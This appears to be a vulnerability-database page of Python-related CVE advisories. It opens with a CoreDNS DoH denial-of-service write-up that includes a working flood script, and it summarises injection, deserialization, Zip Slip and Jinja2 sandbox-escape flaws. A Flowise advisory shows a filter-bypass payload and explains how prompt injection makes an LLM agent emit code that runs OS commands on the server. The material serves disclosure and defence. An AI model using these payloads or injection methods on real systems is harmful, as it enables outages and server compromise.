io.ReadAll(http.MaxBytesReader(nil, r, 65536)) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ``` So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs. In addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path: ```go srv := &http.Server{ ReadTimeout: s.ReadTimeout, WriteTimeout: s.WriteTimeout, IdleTimeout: s.IdleTimeout, ErrorLog: stdlog.New(&loggerAdapter{}, "", 0), } ``` As a result, oversized DoH GET request targets are processed through: 1. HTTP request-line parsing 2. URL query parsing / unescaping 3. DoH GET extraction 4. base64 decoding 5. DNS message unpacking before the request is rejected. ### Root cause The root cause is missing early size validation on the DoH GET path. More specifically: * `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets. * The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound. * `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection. * The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound. This creates a pre-validation resource-amplification path for DoH GET. ### PoC #### Local test setup This was reproduced locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled. Create a self-signed certificate: ```bash openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \ -keyout key.pem -out cert.pem \ -subj "/CN=127.0.0.1" ``` Create this `Corefile`: ```txt https://127.0.0.1:8443 { whoami log errors tls cert.pem key.pem pprof 127.0.0.1:6060 } ``` Run CoreDNS: ```bash ./coredns -conf Corefile ``` #### Proof-of-concept script ```python #!/usr/bin/env python3 import argparse import base64 import collections import concurrent.futures import http.client import ssl import time def send_one(host, port, path, timeout): ctx = ssl._create_unverified_context() conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx) try: conn.request("GET", path, headers={ "Accept": "application/dns-message", "Connection": "close", }) resp = conn.getresponse() resp.read() return resp.status except Exception as e: return f"ERR:{type(e).__name__}" finally: try: conn.close() except Exception: pass def main(): ap = argparse.ArgumentParser() ap.add_argument("--host", default="127.0.0.1") ap.add_argument("--port", type=int, default=8443) ap.add_argument("--decoded-kib", type=int, default=720) ap.add_argument("--workers", type=int, default=64) ap.add_argument("--requests", type=int, default=5000) ap.add_argument("--timeout", type=float, default=5.0) args = ap.parse_args() raw = b"A" * (args.decoded_kib * 1024) b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode() path = "/dns-query?dns=" + b64 print(f"[+] target = https://{args.host}:{args.port}") print(f"[+] decoded bytes = {len(raw):,}") print(f"[+] encoded chars = {len(b64):,}") print(f"[+] request-target length = {len(path):,}") print(f"[+] workers = {args.workers}, requests = {args.requests}") print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n") started = time.time() results = collections.Counter() with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex: futs = [ ex.submit(send_one, args.host, args.port, path, args.timeout) for _ in range(args.requests) ] for i, fut in enumerate(concurrent.futures.as_completed(futs), 1): results[fut.result()] += 1 if i % 10 == 0 or i == args.requests: print(f"[{i}/{args.requests}] {dict(results)}") elapsed = time.time() - started print("\n[+] done") print(f"[+] elapsed = {elapsed:.2f}s") print(f"[+] summary = {dict(results)}") if __name__ == "__main__": main() ``` Run the PoC: ```bash python3 poc_doh_get_oversize_https.py \ --host 127.0.0.1 \ --port 8443 \ --decoded-kib 720 \ --workers 64 \ --requests 5000 ``` #### Profiling commands used during reproduction CPU profile: ```bash (curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \ sleep 1 ; \ python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \ wait go tool pprof -top ./coredns cpu_attack.pb.gz ``` Heap / allocation profiles: ```bash curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz ``` ### Reproduction results The issue was confirmed using the following: * CoreDNS 1.14.2 * linux/amd64 * go1.26.1 PoC payload characteristics: * decoded payload size: `737,280 bytes` * base64url-encoded `dns` length: `983,040` * request-target length: `983,055` Observed request outcome: * `5000 / 5000` requests returned `400 Bad Request` * total runtime for the 5000-request run: `18.22s` The important point is that the requests are rejected only after expensive processing has already happened. #### CPU profile highlights The CPU profile captured during the attack showed significant time in: * `net/http.readRequest` * `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` * `encoding/base64.(*Encoding).DecodeString` * Go GC worker paths Representative cumulative values from the captured profile included: * `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` → `10.91s` * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `3.50s` * `encoding/base64.(*Encoding).DecodeString` → `3.46s` * `net/http.readRequest` → `10.57s` * `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` → `7.38s` * `runtime.gcBgMarkWorker` and related GC paths were also heavily active This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection. #### Allocation profile highlights Allocation profiling showed very large transient allocation volume caused by the rejected requests: * total `alloc_space`: `26,756.48 MB` Top contributors included: * `net/textproto.(*Reader).readLineSlice` → `19,668.19 MB` * `net/textproto.(*Reader).ReadLine` → `3,738.84 MB` * `encoding/base64.(*Encoding).DecodeString` → `2,766.16 MB` Within the CoreDNS DoH GET path specifically: * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `2,773.67 MB` Heap delta (`inuse_space`) also showed live growth attributable to this path, including: * `encoding/base64.(*Encoding).DecodeString` → `7,629.75 kB` #### Memory observations Runtime memory monitoring showed a clear increase in peak resident usage during the attack: * baseline `VmHWM / VmRSS` before load was approximately `55,864 kB` * observed `VmHWM` during testing reached approximately `146,100 kB` So even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection. ### Impact A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work. Impact includes: * elevated CPU consumption * large transient allocations * increased garbage-collection pressure * higher peak resident memory usage * degraded throughput and responsiveness * denial of service risk on memory-constrained or heavily loaded deployments This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication. The fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated. ### Suggested remediation A robust fix should address both stages of the problem: 1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing. 2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`. 3. Preserve equivalent size constraints across GET and POST paths. A minimal hardening direction would be: * reject oversized GET requests before `req.URL.Query()` on the DoH path * reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding * reject any decoded payload larger than the supported DNS message size before unpacking

Suse OpenSSL Python +2
NVD GitHub VulDB
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

OpenClaw before version 2026.3.31 allows local authenticated attackers to redirect Python package-index traffic by injecting malicious URLs through unsanitized PIP_INDEX_URL and UV_INDEX_URL environment variables, enabling interception or manipulation of package management operations. The vulnerability requires local access and authentication but can result in high integrity impact through compromised package delivery. No active exploitation has been publicly confirmed, but the attack surface is direct and the remediation is straightforward.

Python Authentication Bypass
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Monitor

HTTP request smuggling in Apache Pony Mail (Lua implementation) enables remote unauthenticated attackers to achieve complete admin account takeover with critical impact across confidentiality, integrity, and availability. This affects all versions of the retired Lua codebase - Apache has abandoned support with no patch planned, recommending migration to alternative solutions. CVSS 9.8 critical severity reflects trivial network-based exploitation requiring no authentication or user interaction.

Information Disclosure Python Request Smuggling
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.

Information Disclosure Python Suse +1
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

Improper authorization in Vanna AI's Legacy Flask API allows remote unauthenticated attackers to bypass authentication controls and gain unauthorized access. Affects Vanna versions up to 2.0.2. A publicly available proof-of-concept exploit has been disclosed on GitHub, though vendor has not responded to disclosure. CVSS 7.3 severity reflects network-accessible attack with low complexity requiring no privileges or user interaction, enabling confidentiality, integrity, and availability impacts.

Authentication Bypass Python
NVD VulDB GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Traefik's BasicAuth middleware contains a timing side-channel vulnerability that allows attackers to enumerate valid usernames through response-time analysis. A map key/value confusion in the constant-time comparison fallback causes the `notFoundSecret` variable to always resolve to an empty string, causing authentication checks against non-existent users to complete in microseconds (~0.48ms) instead of performing full bcrypt evaluation (~62ms), creating a 130x timing oracle. Attackers can distinguish existing users from non-existent ones by measuring HTTP response times, enabling account enumeration without credentials.

Oracle Information Disclosure Python +2
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cross-site request forgery (CSRF) in Authlib's Starlette OAuth client cache feature (versions prior to 1.6.11) allows unauthenticated remote attackers to forge requests that manipulate cached OAuth state, potentially leading to session hijacking or token theft. The vulnerability requires user interaction (UI:R) and affects confidentiality and integrity. Vendor-released patch: version 1.6.11.

CSRF Python Suse +1
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Authentication bypass in Traefik's ForwardAuth middleware allows remote attackers to spoof the X-Forwarded-Prefix header and gain unauthorized access to protected backend routes when deployed behind trusted upstream proxies. Despite trustForwardHeader=false configuration, Traefik fails to sanitize attacker-controlled X-Forwarded-Prefix values in authentication subrequests, enabling attackers to impersonate trusted path prefixes (e.g., /admin) and bypass authorization checks in the authentication service. The vulnerability affects Traefik v2.x and v3.x series and is confirmed patched in versions 2.11.43, 3.6.14, and 3.7.0-rc.2. No KEV listing or EPSS data available at time of analysis, but a detailed proof-of-concept with complete Docker reproduction environment is publicly available in the GitHub advisory, significantly lowering exploitation complexity for attackers.

Docker Nginx Authentication Bypass +1
NVD GitHub VulDB
EPSS 0% CVSS 8.9
HIGH PATCH This Week

Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. The vulnerability requires only that a victim read a crafted Parquet file from any source (cloud storage, HuggingFace datasets, shared filesystems)-no cluster access or authentication needed. This reintroduces a vulnerability class previously fixed in May 2024, making it a regression introduced in July 2025 (PR #54831). Working proof-of-concept exists demonstrating exploitation via HuggingFace datasets following Ray's own documentation. EPSS data not available, not currently in CISA KEV.

Python Code Injection Deserialization +1
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Attackers can forge Stripe webhook events to obtain unlimited API quota without payment in QuantumNous new-api (Go package github.com/QuantumNous/new-api). The vulnerability exploits an empty default webhook secret that allows HMAC signature forgery, missing payment status validation, and cross-gateway order fulfillment logic that permits completing orders created through any payment provider (Epay, Creem, Waffo) via fabricated Stripe callbacks. Virtually all deployments with any payment method enabled are vulnerable in default configuration. Fixed in version 0.12.10. No public exploit code identified at time of analysis, but the detailed advisory includes a proof-of-concept pseudocode demonstrating the attack chain. CVSS 7.1 (High) with low attack complexity and low privileges required indicates practical exploitation risk for deployed instances.

Google Nginx Python +1
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Pre-authentication NoSQL injection in Dgraph allows remote unauthenticated attackers to exfiltrate entire databases and modify schemas via crafted JSON mutation keys. The vulnerability exploits unsanitized language tag fields in the addQueryIfUnique function, enabling DQL query injection through specially crafted HTTP POST requests to port 8080. Attackers can extract all database contents including credentials, secrets, and AWS keys with two HTTP requests against default configurations where ACL is disabled. CVSS 9.1 (Critical) with network vector, no authentication required, and low attack complexity. No public exploit code confirmed outside the GitHub advisory, though a complete proof-of-concept with video demonstration exists in the advisory. EPSS data not available for this recent CVE.

Docker Authentication Bypass Denial Of Service +3
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Remote unauthenticated attackers can exfiltrate all data from Dgraph databases via DQL injection in the /mutate endpoint's cond parameter. Default configurations with ACL disabled allow single HTTP POST requests to bypass authentication and execute arbitrary read queries, returning complete database contents including credentials, PII, and secrets. The vulnerability exploits unsanitized string concatenation in buildUpsertQuery() where user-supplied cond values are written directly into DQL queries without escaping or validation. Proof-of-concept demonstrates extraction of AWS credentials, GCP service account keys, and user secrets in a single request. No public exploitation confirmed at time of analysis, but POC code publicly available via GitHub advisory. EPSS data not available; CVSS 9.1 indicates critical severity with network vector and no authentication required.

Docker Authentication Bypass Denial Of Service +3
NVD GitHub
EPSS 0% CVSS 8.9
HIGH PATCH This Week

SQL injection in Roxy-WI versions before 8.2.6.4 allows remote unauthenticated attackers to execute arbitrary SQL commands via the server_ip parameter in the haproxy_section_save function. The vulnerability stems from unsanitized URL path parameters being directly interpolated into SQL queries using Python string formatting. Proof-of-concept code exists (CVSS E:P), and the CVSS 4.0 score of 8.9 with network vector (AV:N), low complexity (AC:L), and no authentication (PR:N) indicates a critical, easily exploitable vulnerability. Vendor-released patch available in version 8.2.6.4.

Nginx SQLi Python +1
NVD GitHub
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.

Python Command Injection
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Mako is a template library written in Python. Prior to 1.3.11, TemplateLookup.get_template() is vulnerable to path traversal when a URI starts with // (e.g., //../../../secret.txt). The root cause is an inconsistency between two slash-stripping implementations. Any file readable by the process can be returned as rendered template content when an application passes untrusted input directly to TemplateLookup.get_template(). This vulnerability is fixed in 1.3.11.

Python Path Traversal
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.

Python Code Injection RCE
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. Versions 0.0.41 through 0.0.93 have a vulnerability in `LivekitFrameSerializer` - an optional, non-default, undocumented frame serializer class (now deprecated) intended for LiveKit integration. The class's `deserialize()` method uses Python's `pickle.loads()` on data received from WebSocket clients without any validation or sanitization. This means that a malicious WebSocket client can send a crafted pickle payload to execute arbitrary code on the Pipecat server. The vulnerable code resides in `src/pipecat/serializers/livekit.py` (around line 73), where untrusted WebSocket message data is passed directly into `pickle.loads()` for deserialization. If a Pipecat server is configured to use LivekitFrameSerializer and is listening on an external interface (e.g. 0.0.0.0), an attacker on the network (or the internet, if the service is exposed) could achieve remote code execution (RCE) on the server by sending a malicious pickle payload. Version 0.0.94 contains a fix. Users of Pipecat should avoid or replace unsafe deserialization and improve network security configuration. The best mitigation is to stop using the vulnerable LivekitFrameSerializer altogether. Those who require LiveKit functionality should upgrade to the latest Pipecat version and switch to the recommended `LiveKitTransport` or another secure method provided by the framework. Additionally, always follow secure coding practices: never trust client-supplied data, and avoid Python pickle (or similar unsafe deserialization) in network-facing components.

Python Deserialization RCE
NVD GitHub VulDB
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

PySpector versions prior to 0.1.8 allow arbitrary code execution within the PySpector process when a malicious plugin is supplied and executed. The plugin security validator uses incomplete AST-based static analysis that fails to block dangerous Python constructs, permitting attackers with write access to plugin files to bypass the blocklist and achieve remote code execution. The vulnerability is fixed in version 0.1.8.

Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

LangSmith Client SDKs in JavaScript (prior to 0.5.19) and Python (prior to 0.7.31) fail to apply output redaction controls to streaming token events, allowing sensitive LLM-generated content to leak into LangSmith platform storage despite hideOutputs/hide_outputs being enabled. Unauthenticated remote attackers can intercept or access unredacted streamed tokens if they gain visibility into run events, bypassing the intended confidentiality controls.

Information Disclosure Python
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Denial of service via memory exhaustion in pypdf prior to 6.10.2 allows local attackers with user interaction to crash applications processing crafted PDF files containing FlateDecode-compressed images with inflated size values. The vulnerability exhausts available RAM during decompression, affecting any system using vulnerable pypdf versions to parse untrusted PDF documents.

Information Disclosure Python Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Denial of service via algorithmic complexity in pypdf versions prior to 6.10.2 allows local attackers to cause long runtimes by crafting a PDF with an excessively large trailer /Size value when loaded in incremental mode. The vulnerability requires user interaction to load the malicious PDF and results in availability degradation rather than data compromise. Patch version 6.10.2 is available from the vendor.

Information Disclosure Python Red Hat +1
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Memory exhaustion in pypdf prior to 6.10.2 allows local attackers to craft malicious PDF files that exhaust system RAM when processed. The vulnerability requires user interaction to open a specially crafted PDF containing a /FlateDecode stream with a /Predictor value other than 1 and large predictor parameters. Vendor-released patch available in version 6.10.2.

Information Disclosure Python Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Denial of service in pypdf prior to version 6.10.1 allows remote attackers to craft malicious PDF files with oversized cross-reference stream `/Size` values or object stream `/N` values, causing excessive processing time and long runtimes. No authentication is required; the vulnerability is triggered by parsing a specially crafted PDF file. Patch version 6.10.1 is available from the vendor.

Information Disclosure Python Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in ci4ms content management system allows authenticated backend users with theme creation permissions to write arbitrary PHP files via Zip Slip path traversal. A working proof-of-concept demonstrates uploading a malicious theme archive containing path-traversal entries (../../public/shell.php) that bypass extraction directory boundaries, placing executable code under the web root. Vendor-released patch available in version 0.31.5.0. No CISA KEV listing or EPSS data available, but publicly disclosed PoC significantly lowers exploitation barrier for attackers with valid credentials.

RCE PHP Python +1
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in ci4ms (CodeIgniter 4 Management System) versions prior to 0.31.5.0 allows authenticated backend users with backup creation permissions to write PHP webshells to the public web root via Zip Slip path traversal during backup restoration. The vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code exists. CVSS 9.4 (Critical) aligns with the real-world risk, as exploitation requires only low-privilege authentication and the affected route is exempt from CSRF protection, enabling drive-by attacks against logged-in administrators. Vendor-released patch version 0.31.5.0 addresses the flaw by implementing path validation during ZIP extraction.

RCE PHP Python +1
NVD GitHub
EPSS 0% CVSS 0.6
LOW PATCH Monitor

Path traversal vulnerability in Poetry's tar extraction function allows arbitrary file writes when processing untrusted source distributions on Python 3.10.0-3.10.12 and 3.11.0-3.11.4, where the tarfile.data_filter safety mechanism is absent or broken. The vulnerability is triggered during dependency resolution (poetry add --lock) or installation before the build backend executes, enabling attackers to write files outside the intended extraction directory via crafted tar member paths, symlinks, or hardlinks in malicious sdists.

Ubuntu RCE Python +2
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in InstructLab affects Red Hat Enterprise Linux AI 3 when users download or train models from HuggingFace Hub. The linux_train.py script hardcodes trust_remote_code=True, allowing attackers to execute arbitrary Python code by hosting malicious models on HuggingFace and convincing users to run ilab train, download, or generate commands. This configuration weakness enables complete system compromise through social engineering attacks. CVSS 8.8 with network vector but requires user interaction, reducing automatic exploitation risk. No active exploitation (CISA KEV) or public POC identified at time of analysis.

RCE Python Red Hat Enterprise Linux Ai Rhel Ai 3
NVD VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Session fixation in pyLoad 0.5.0b3.dev97 and earlier allows authenticated users to retain revoked administrative privileges until logout. After an administrator demotes a user's role or revokes permissions, the affected user's active session continues to operate with the old cached privileges, enabling unauthorized administrative actions. Publicly available exploit code exists via GitHub commit e95804fb0d06cbb07d2ba380fc494d9ff89b68c1. With CVSS 8.8 (High) but requiring low-privilege authentication (PR:L), this represents an elevation-of-privilege vector in multi-user pyLoad deployments where role changes are expected to take immediate effect.

Information Disclosure Python
NVD GitHub
EPSS 0% CVSS 9.2
CRITICAL POC PATCH Act Now

## Abstract Trend Micro's Zero Day Initiative has identified a vulnerability affecting FlowiseAI Flowise. ## Vulnerability Details - **Version tested:** 3.0.13 - **Installer file:** https://github.com/FlowiseAI/Flowise - **Platform tested:** Ubuntu 25.10 ## Analysis This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the `run` method of the `CSV_Agents` class. The issue results from the lack of proper sandboxing when evaluating an LLM-generated Python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. ### Product Information FlowiseAI Flowise version 3.0.13 - https://github.com/FlowiseAI/Flowise ### Setup Instructions ```bash npm install -g flowise@3.0.13 npx flowise start ``` ### Root Cause Analysis FlowiseAI Flowise is an open source low-code tool for developers to build customized large language model (LLM) applications and AI agents. It supports integration with various LLMs, data sources, and tools in order to facilitate rapid development and deployment of AI solutions. Flowise offers a web interface with a drag-and-drop editor, as well as an API, through an Express web server accessible over HTTP on port 3000/TCP. One such feature of Flowise is the ability to create chatflows. Chatflows use a drag-and-drop editor that allows a developer to place nodes which control how an interaction with an LLM will occur. One such node is the CSV Agent node that represents an Agent used to answer queries on a provided CSV file. When a user makes a query against a chatflow using the CSV Agent node, the `run` method of the `CSV_Agents` class is called. This method first reads the contents of the CSV file passed to the node and converts it to a base64 string. It then sets up a pyodide environment and creates a Python script to be executed in this environment. This Python script uses pandas to extract the column names and their types from the provided CSV file. The method then creates a system prompt for an LLM using this data as follows: ``` You are working with a pandas dataframe in Python. The name of the dataframe is df. The columns and data types of a dataframe are given below as a Python dictionary with keys showing column names and values showing the data types. {dict} I will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code. Security: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs. Question: {question} Output Code: ``` Where `{dict}` is the extracted column names and `{question}` is the initial prompt provided by the user. This system prompt is sent to an LLM in order for it to generate a Python script based on the user's prompt, and the LLM-generated response is stored in a variable named `pythonCode`. The method then evaluates the `pythonCode` variable in a pyodide environment. While the LLM-generated Python script is evaluated in a non-sandboxed environment, there is a list of forbidden patterns that are checked before the script is executed on the server. The function `validatePythonCodeForDataFrame()` enumerates through a list named `FORBIDDEN_PATTERNS`, which contains pairs of regex patterns and reasons. Each regex pattern is run against the Python script, and if the pattern is found in the script, the script is invalidated and is not run, responding to the request with a reason for rejection. The input validation can be bypassed, which can still lead to running arbitrary OS commands on the server. An example of this is the pattern `/\bimport\s+(?!pandas|numpy\b)/g`, which intends to search for lines of code that import a module other than pandas or numpy. This can be bypassed by importing along with pandas or numpy. For example, consider the following lines of code: ```python import pandas as np, os as pandas pandas.system("xcalc") ``` Here, pandas is imported, but so is the `os` module, with `pandas` as its alias. OS commands can then be invoked with `pandas.system()`. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious Python script that executes attacker-controlled commands on the Flowise server. It is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker-controlled server in a chatflow. This server would respond to prompts with an attacker-controlled Python script instead of an LLM-generated response, which would then be evaluated on the server. ### Relevant Source Code #### `packages/components/nodes/agents/CSVAgent/core.ts` ```ts import type { PyodideInterface } from 'pyodide' import * as path from 'path' import { getUserHome } from '../../../src/utils' let pyodideInstance: PyodideInterface | undefined export async function LoadPyodide(): Promise<PyodideInterface> { if (pyodideInstance === undefined) { const { loadPyodide } = await import('pyodide') const obj: any = { packageCacheDir: path.join(getUserHome(), '.flowise', 'pyodideCacheDir') } pyodideInstance = await loadPyodide(obj) await pyodideInstance.loadPackage(['pandas', 'numpy']) } return pyodideInstance } export const systemPrompt = `You are working with a pandas dataframe in Python. The name of the dataframe is df. The columns and data types of a dataframe are given below as a Python`*

RCE Ubuntu Python +1
NVD GitHub VulDB
EPSS 0% CVSS 5.7
MEDIUM PATCH This Month

Cryptographic algorithm downgrade in AWS Encryption SDK for Python's caching layer allows authenticated local attackers to bypass key commitment policy enforcement through a shared key cache, enabling decryption of single ciphertext to multiple different plaintexts. Affected versions include Python 2 up to 2.5.1, Python 3 up to 3.3.0, and Python 4 up to 4.0.4. AWS has released vendor patches (versions 3.3.1, 4.0.5, and later) to remediate the vulnerability, which requires local access and authenticated credentials but has no known public exploit.

Authentication Bypass Python
NVD GitHub VulDB
EPSS 0% CVSS 6.6
MEDIUM PATCH This Month

Local privilege escalation in python-dotenv before version 1.2.2 allows authenticated users to overwrite arbitrary files via symlink following in the set_key() and unset_key() functions when a cross-device rename fallback is triggered. An attacker with local access and the ability to write to the filesystem can create malicious symlinks that python-dotenv will follow during .env file rewriting, leading to unintended file modification or deletion. The vulnerability requires user interaction (the application must call set_key() or unset_key()) but affects any system using vulnerable versions of the library. No public exploit code or active exploitation has been reported at time of analysis.

Information Disclosure Python Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 5.6
MEDIUM PATCH This Month

### Impact Up to 1.0.0 of `home-assitant-cli` (or `hass-cli` for short) an unrestricted environment was used to handle Jninja2 templates instead of a sandboxed one. The user-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage. E. g., it was possible to render a template with `hass-cli template bad-template.j2 --local` that contained entries like ````j2 {%- set b = environ.__globals__['__builtins__'] -%} {%- set os = b['__import__']('os') -%} {%- set bio = b['__import__']('builtins') -%} ... ```` or other malicious Jinja2 expressions. This can lead to arbitrary code execution on the local machine. In a two step process an adversary could trick/convince an user to download third-party templates which contain harmful code (e. g., perform data manipulation or establish a remote shell) then to render those templates unchecked/reviewed/verified with `--local`. The issue only affect the local machine and not a remote Home Assistant instance. It also requires user interventions. ### Patches 1.0.0 uses `ImmutableSandboxedEnvironment` and restricts the usage of environment variables. ### Workarounds Evaluate the Jninja2 templates manually or tool-based before rendering with `hass-cli`.

Code Injection Python RCE
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM This Month

Stored cross-site scripting (XSS) in wger fitness application allows authenticated users to inject malicious JavaScript via unescaped license attribution fields in ingredient and image models, which executes when any visitor views the affected page. The vulnerability persists in the database and can be exploited to steal session cookies, perform unauthorized actions as other users, or conduct phishing attacks. Affected versions allow low-privilege authenticated users (any non-temporary account) to create ingredients with JavaScript payloads in the `license_author` field, which bypasses all input sanitization and is rendered with Django's `|safe` filter, disabling auto-escaping.

XSS Python
NVD GitHub
EPSS 0% CVSS 7.6
HIGH This Week

Authenticated low-privileged users in wger can modify installation-wide gym configuration via /config/gym-config/edit due to missing permission enforcement, enabling vertical privilege escalation. The GymConfigUpdateView declares 'config.change_gymconfig' permission but inherits WgerFormMixin instead of WgerPermissionMixin, causing the permission check to never execute. Exploiting this allows attackers to manipulate default gym assignments affecting all users, with GymConfig.save() automatically reassigning user profiles and creating gym configurations tenant-wide. CVSS 7.6 (High) with network attack vector, low complexity, and low privileges required. No active exploitation (KEV) or public POC identified at time of analysis, though GitHub advisory provides detailed reproduction steps.

Authentication Bypass Docker Python +1
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Race condition in pyLoad's Flask session cookie handler allows unauthenticated attackers to manipulate the SESSION_COOKIE_SECURE flag globally across all concurrent requests by spoofing the X-Forwarded-Proto header. On deployments behind a TLS-terminating proxy, this enables session cookie downgrade attacks resulting in plaintext cookie transmission; on default plain HTTP deployments, it causes session denial of service by forcing the Secure flag and breaking all concurrent user sessions. The vulnerability requires no authentication and exploits a multi-threaded race window in the Cheroot WSGI server (request_queue_size=512) combined with missing proxy origin validation (acknowledged TODO in code).

Denial Of Service Kubernetes Python
NVD GitHub
EPSS 0% CVSS 2.9
LOW PATCH Monitor

